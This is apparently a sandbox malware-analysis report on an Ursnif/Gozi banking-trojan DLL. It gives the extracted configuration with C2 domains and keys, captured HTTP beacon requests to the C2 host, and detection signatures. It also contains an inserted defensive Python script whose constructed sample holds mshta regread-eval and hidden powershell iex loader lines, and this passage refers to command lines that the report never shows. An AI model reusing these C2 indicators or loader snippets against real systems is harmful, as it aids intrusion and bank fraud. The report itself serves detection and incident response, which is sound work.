Windows Analysis Report lj3H69Z3Io.dll

Overview

General Information

Sample Name: lj3H69Z3Io.dll
Analysis ID: 447090
MD5: 0bb29556ece1c51c751cb4e7c8752ddc
SHA1: 324cc356a56c68e51f09348e91405001e68e4a08
SHA256: af1b052362469a67fcd871558b24efa2be44a4b29f88112e5c2d2295a1dc4252
Tags: dll, Gozi, ISFB, Ursnif

Detection

Ursnif
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Encoded IEX
Yara detected Ursnif
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Mshta Spawning Windows Shell
Suspicious powershell command line found
Writes registry values via WMI
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

AV Detection:

Found malware configuration
Source: 00000003.00000003.351054723.00000000027A0000.00000040.00000001.sdmp Malware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "RS1bISYM3RiUEB+kp8sXk6GKaUSJTMdHLJSpyFRYeZm6NlcBwtjx2F3paluhib1HCWprL2CGUSXu41FZM2nRjuIHp5Tc3Qvf1bHq8axt1kKB98ZnmfPh2SiQVpHGVA+TOuAe97sVP0cE6xXX2ilAxOJC4Rf34gUi3XolV8kPrfJCHChbu9w1+s7rrVZTOVjBW+TY1D3deVJlDZHvhlBuumQis3pP1XsoLa3Qay006/AhbN9RIoAAij7c7SagXOd4BXA8L9GZCI5rXohvITy2kTk5pHs5LCiTFpT9Pohv1JBotMkOGx7WyBP+G1Cbx4yBjRbbIosmagFN4Hgw4QhKyFdWlAfAWJCgEYrSkeFoNBM=", "c2_domain": ["gtr.antoinfer.com", "app.bighomegl.at"], "botnet": "2500", "server": "580", "serpent_key": "B43ovnLWYCtQUCWU", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}
Multi AV Scanner detection for domain / URL
Source: gtr.antoinfer.com Virustotal: Detection: 7%
Multi AV Scanner detection for submitted file
Source: lj3H69Z3Io.dll Virustotal: Detection: 41%
Source: lj3H69Z3Io.dll ReversingLabs: Detection: 31%

Compliance:

Uses 32bit PE files
Source: lj3H69Z3Io.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Source: lj3H69Z3Io.dll Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
Source: Binary string: shcore.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp
Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
Source: Binary string: fltLib.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: rundll32.pdbk source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: shell32.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
Source: Binary string: wsspicli.pdb5 source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: propsys.pdb- source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: wimm32.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
Source: Binary string: mpr.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: cryptbase.pdb; source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: Bed.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
Source: Binary string: setupapi.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: upwntdll.pdb source: WerFault.exe, 00000014.00000002.436609525.0000000004DF9000.00000004.00000001.sdmp
Source: Binary string: winspool.pdb! source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: shcore.pdbk source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp
Source: Binary string: profapi.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: winspool.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
Source: Binary string: sechost.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: propsys.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp
Source: Binary string: c:\201\Their\Quart-Sheet\497_who\Bed.pdb source: rundll32.exe, 00000002.00000002.444299096.000000006E191000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.616072901.000000006E191000.00000002.00020000.sdmp, WerFault.exe, 00000014.00000003.411602089.0000000004DE1000.00000004.00000001.sdmp, lj3H69Z3Io.dll
Source: Binary string: powrprof.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: netapi32.pdbD source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: ole32.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp
Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: netapi32.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp
Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp
Source: Binary string: rundll32.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
Source: Binary string: wtsapi32.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdb' source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: sfc_os.pdbS source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: sfc.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: apphelp.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
Source: Binary string: wuser32.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdbk source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
Source: Binary string: c:\201\Their\Quart-Sheet\497_who\Bed.pdbbj source: WerFault.exe, 00000014.00000003.412073889.0000000004DB5000.00000004.00000001.sdmp
Source: Binary string: netutils.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: Nc:\201\Their\Quart-Sheet\497_who\Bed.pdb source: WerFault.exe, 00000014.00000003.411494273.0000000004E04000.00000004.00000001.sdmp
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_6E188626 FindFirstFileExA, 2_2_6E188626

Networking:

Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: DIGITALOCEAN-ASNUS
Source: global traffic HTTP traffic detected:
  GET /4khtvsQ0u/_2Bibxls4V27IXxwFbLo/MVAeZiN_2BcOXrnrV8V/qJdJNxZ6Bgv5NEeycuU5RT/xP63sFYeQbF7V/py7Hi7cb/9YfAdWQtdGthxteTogc4W5n/e4pHdJmwQV/Xb_2ByBc4q7LehmCP/qbPYu2dVkV6R/HcylsChDiT2/MxSzZGJm_2F7kQ/SwyqdbxYkDgH_2FqkftiZ/sgfsFtj_2BtQQ2R6/R1qw5igRxvImwz6/pMeyM_2FrLNrloESyl/5_2BeunOI/9zlfRQun7lnhbsKL_2FH/F_2B8nMOma_2F2fjvu5/bI8nw1gkOTg_2F0CTqoQIr/cSQsg2LKmpe1I/kDimvPNH/SgPLk HTTP/1.1
  Accept: text/html, application/xhtml+xml, image/jxr, */*
  Accept-Language: en-US
  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
  Accept-Encoding: gzip, deflate
  Host: gtr.antoinfer.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
  GET /favicon.ico HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
  Host: gtr.antoinfer.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
  GET /Pl9Eori10/TWROVDxUXG0e5P8cvyge/ZU2BrrTT9UbiVqqjDG4/pcVLHkjQ_2FTIEKMeI9p0c/uvvfHn2PMXNEy/YMBxD3SD/aXgaxQm1VvX_2F13h2xPwK_/2Be7i5l50E/A7ENFq4ZupT65ephY/chqySvAke9ce/Kevf8ZZImEj/1Va42IfLQ3XJd9/R1lLLjkYwIWCsGvDlqysG/bJCIxC_2Ba_2FKBG/1sCib9KWGT9006o/pVIAR6x7f8e8pX6JMX/r5dwKRidW/K11bWM2mJHwpxkeOpFZf/WuqCfL3c8woO2jHlv7x/oi4kjIDfCy176FSPyJZhM9/EN_2FkQv43sxx/a HTTP/1.1
  Accept: text/html, application/xhtml+xml, image/jxr, */*
  Accept-Language: en-US
  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
  Accept-Encoding: gzip, deflate
  Host: gtr.antoinfer.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
  GET /favicon.ico HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
  Host: gtr.antoinfer.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
  GET /M70Tzsw1MNAdF/xfm5A_2F/icgFe0hTlDYi8x1LZCDgadb/p8hAogRvpL/JEjshnYytb_2FaVCd/bp1e8aV2PI_2/FY5oP4oo0f6/GeARX2_2FlA_2F/2BhurwBe_2BrsQ1B1bUK7/wilinEmmYIdaZ6lz/71Mw33QzoCtr9s9/ULFilVIFcIxUDJIsEo/crrSiFkaK/6sQSCYti3ETwug18IBlk/b94MQVqQ698rgMibrOo/RMBVkg8AFrK4uT2Dq6pO06/OdceZPFn8QQWz/SARUSfJd/dirYBJB3Uuu4IivFAYs9FmV/Pmcsy6YvBv/Lcgiqf1bUTKnYCeNL/dikDMv66Bty/6H HTTP/1.1
  Accept: text/html, application/xhtml+xml, image/jxr, */*
  Accept-Language: en-US
  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
  Accept-Encoding: gzip, deflate
  Host: gtr.antoinfer.com
  Connection: Keep-Alive
Source: unknown DNS traffic detected: queries for: gtr.antoinfer.com
Source: global traffic HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Server: nginx
  Date: Mon, 12 Jul 2021 09:50:36 GMT
  Content-Type: text/html; charset=utf-8
  Transfer-Encoding: chunked
  Connection: close
  Content-Encoding: gzip
  Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
  Note: the body is a single 0x6a-byte chunk holding a gzip stream (1f 8b 08 magic); its ISIZE trailer (92 00 00 00 = 146 bytes) matches the length of the stock nginx 404 page, so the only captured response is a plain 404, not C2 data. The Data Ascii rendering of compressed bytes is not meaningful.
Source: powershell.exe, 0000002A.00000002.626923996.00000273E0C30000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: {08A52032-E342-11EB-90E4-ECF4BB862DED}.dat.32.dr, ~DFBCEA36BA3DC5EC74.TMP.32.dr String found in binary or memory: http://gtr.antoinfer.com/4khtvsQ0u/_2Bibxls4V27IXxwFbLo/MVAeZiN_2BcOXrnrV8V/qJdJNxZ6Bgv5NEeycuU5RT/x
Source: rundll32.exe, 00000003.00000002.610195146.0000000002CD0000.00000002.00000001.sdmp, powershell.exe, 0000002A.00000002.609722055.00000273C7180000.00000002.00000001.sdmp String found in binary or memory: http://gtr.antoinfer.com/M70Tzsw1MNAdF/xfm5A_2F/icgFe0hTlDYi8x1LZCDgadb/p8hAogRvpL/JEjshnYytb_2
Source: {08A52036-E342-11EB-90E4-ECF4BB862DED}.dat.32.dr String found in binary or memory: http://gtr.antoinfer.com/M70Tzsw1MNAdF/xfm5A_2F/icgFe0hTlDYi8x1LZCDgadb/p8hAogRvpL/JEjshnYytb_2FaVCd
Source: {08A52034-E342-11EB-90E4-ECF4BB862DED}.dat.32.dr, ~DF5A692A62F2D75F35.TMP.32.dr String found in binary or memory: http://gtr.antoinfer.com/Pl9Eori10/TWROVDxUXG0e5P8cvyge/ZU2BrrTT9UbiVqqjDG4/pcVLHkjQ_2FTIEKMeI9p0c/u
Source: powershell.exe, 0000002A.00000002.622133874.00000273D895C000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000002A.00000002.612577648.00000273C8AFF000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000002A.00000002.610882160.00000273C88F1000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000002A.00000002.612577648.00000273C8AFF000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000002A.00000002.622133874.00000273D895C000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000002A.00000002.622133874.00000273D895C000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000002A.00000002.622133874.00000273D895C000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000002A.00000002.612577648.00000273C8AFF000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000002A.00000002.622133874.00000273D895C000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match File source: 3.3.rundll32.exe.4f594a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000003.556259843.0000000004DDC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.537141120.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.537104299.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.536940847.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.548180639.0000000004F59000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.537188735.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.537165510.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.537047715.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.536909133.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.536969040.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif
Source: Yara match File source: 3.3.rundll32.exe.4f594a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000003.556259843.0000000004DDC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.537141120.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.537104299.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.536940847.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.548180639.0000000004F59000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.537188735.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.537165510.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.537047715.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.536909133.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.536969040.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY

System Summary:

Writes registry values via WMI
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
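The StdRegProv writes above are how the loader parks its next stages in the registry; the mshta and powershell command lines later in this section read them back from HKCU\Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550 (values DeviceFile and UtilTool). On a live host the quickest way to preserve that key is `reg export "HKCU\Software\AppDataLow\Software\Microsoft" appdatalow.reg /y`. The Python below is an added example, not report or malware code: it parses such an export offline, decodes binary values the way the report's `[System.Text.Encoding]::ASCII.GetString` call does, and flags values that carry loader indicators or are large enough to be a stored module. The GUID key and the two value names are from this report; the value contents, the Modules blob and the Run-key entry in the constructed sample are stand-ins, not data recovered from the sample.

```python
"""Triage a 'reg export' of the key this report's mshta/powershell chain reads.

Added example, not Joe Sandbox's or the malware's code.  The GUID key and the value
names DeviceFile / UtilTool are from this report's command lines; the value contents,
the Modules blob and the Run-key entry in SAMPLE_REG are constructed stand-ins.
"""
import re
from typing import Dict, List, Tuple

GUID_KEY = r"HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550"
INDICATORS = (r"\biex\b", r"invoke-expression", r"activexobject", r"regread", r"wscript\.shell",
              r"frombase64string", r"powershell", r"hta:application")
Value = Tuple[str, object]


def _unescape_sz(s: str) -> str:
    # .reg escapes backslash and double quote with a leading backslash
    out, i = [], 0
    while i < len(s):
        if s[i] == "\\" and i + 1 < len(s):
            out.append(s[i + 1]); i += 2
        else:
            out.append(s[i]); i += 1
    return "".join(out)


def _parse_value(val: str) -> Value:
    if val.startswith('"') and val.endswith('"'):
        return "REG_SZ", _unescape_sz(val[1:-1])
    if val.lower().startswith("dword:"):
        return "REG_DWORD", int(val[6:], 16)
    m = re.match(r"hex(?:\(([0-9a-f]+)\))?:(.*)$", val, re.I)
    if not m:
        return "REG_UNPARSED", val
    data = bytes(int(h, 16) for h in m.group(2).split(",") if h.strip())
    code = (m.group(1) or "3").lower()
    if code == "2":
        return "REG_EXPAND_SZ", data.decode("utf-16-le", errors="replace").rstrip("\0")
    if code == "7":
        return "REG_MULTI_SZ", [s for s in data.decode("utf-16-le", errors="replace").split("\0") if s]
    if code == "b":
        return "REG_QWORD", int.from_bytes(data, "little")
    return ("REG_BINARY" if code == "3" else f"REG_TYPE_{code}"), data


def parse_reg_text(text: str) -> Dict[str, Dict[str, Value]]:
    """Parse a .reg export into {key: {name: (type, value)}}.  Read real exports with
    open(path, encoding="utf-16"): reg.exe writes UTF-16LE with a BOM.  Hex values
    continue over lines that end in a backslash."""
    logical: List[str] = []
    for raw in text.splitlines():
        line = raw.rstrip()
        if logical and logical[-1].endswith("\\"):
            logical[-1] = logical[-1][:-1] + line.strip()   # join continuation line
        else:
            logical.append(line)
    keys: Dict[str, Dict[str, Value]] = {}
    current = None
    for line in logical:
        if not line or line.startswith(("Windows Registry Editor", "REGEDIT4", ";")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        name_part, sep, val = line.partition("=")
        if current is None or not sep:
            continue
        name = "@" if name_part == "@" else _unescape_sz(name_part.strip('"'))
        keys[current][name] = _parse_value(val)
    return keys


def triage(keys: Dict[str, Dict[str, Value]], big: int = 4096) -> List[dict]:
    """Flag values whose text (bytes decoded as ASCII, as the report's GetString call
    does) carries loader indicators, plus binary blobs large enough to be a module."""
    findings = []
    for key, values in keys.items():
        for name, (vtype, value) in values.items():
            if isinstance(value, bytes):
                text, size = value.decode("ascii", errors="replace"), len(value)
            elif isinstance(value, str):
                text, size = value, len(value)
            else:
                continue
            hits = [p for p in INDICATORS if re.search(p, text, re.I)]
            if hits or size >= big:
                findings.append({"key": key, "name": name, "type": vtype, "size": size, "indicators": hits})
    return findings


def _hex_value(data: bytes, width: int = 24) -> str:
    # format bytes the way reg.exe does: hex:xx,xx,\ with indented continuation lines
    parts = [f"{b:02x}" for b in data]
    return "hex:" + ",\\\n  ".join(",".join(parts[i:i + width]) for i in range(0, len(parts), width))


# Constructed sample export; only the key path and the two value names are from the report.
JS_STAGE = "window.flag=1;new ActiveXObject('WScript.Shell').Run('powershell.exe -w hidden iex (...)',0);"
PS_STAGE = b"$b=[Convert]::FromBase64String('QUFBQQ==');# constructed stand-in for the stored stage\n"
SAMPLE_REG = (
    "Windows Registry Editor Version 5.00\n\n"
    f"[{GUID_KEY}]\n"
    f'"DeviceFile"="{JS_STAGE}"\n'
    f'"UtilTool"={_hex_value(PS_STAGE)}\n'
    f'"Modules"={_hex_value(bytes(4096))}\n'
    '"Cfg"=dword:0000000a\n\n'
    "[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run]\n"
    r'''"Constructed"="mshta.exe \"about:<hta:application><script>eval(new ActiveXObject('wscript.shell').regread('HKCU\\\\Software\\\\AppDataLow\\\\Software\\\\Microsoft\\\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\\DeviceFile'))</script>\""''' "\n"
)

if __name__ == "__main__":
    for f in triage(parse_reg_text(SAMPLE_REG)):
        print(f"{f['name']:<12} {f['type']:<11} {f['size']:>6} B  {', '.join(f['indicators']) or 'large blob'}")
```

The size threshold is a hunt heuristic, not a signature: the report shows several SetBinaryValue calls into the same key, and on real hosts the binary values that hold modules are far larger than any configuration value. Sort the findings by size and read the small string values first; that is where the mshta and powershell stages sit.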
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E141B9C GetProcAddress,NtCreateSection,memset, 3_2_6E141B9C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E141EC7 NtMapViewOfSection, 3_2_6E141EC7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E142485 NtQueryVirtualMemory, 3_2_6E142485
Detected potential crypto function
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_6E167CA0 2_2_6E167CA0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_6E16B840 2_2_6E16B840
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_6E1796BD 2_2_6E1796BD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_6E17CEC0 2_2_6E17CEC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_6E17FF3F 2_2_6E17FF3F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_6E175FDD 2_2_6E175FDD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_6E186CF9 2_2_6E186CF9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_6E189B9C 2_2_6E189B9C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E142264 3_2_6E142264
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E16B840 3_2_6E16B840
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E1796BD 3_2_6E1796BD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E17CEC0 3_2_6E17CEC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E17FF3F 3_2_6E17FF3F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E175FDD 3_2_6E175FDD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 42_2_00007FFAEEA1056F 42_2_00007FFAEEA1056F
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 6E174A80 appears 67 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 6E17B4B4 appears 34 times
One or more processes crash
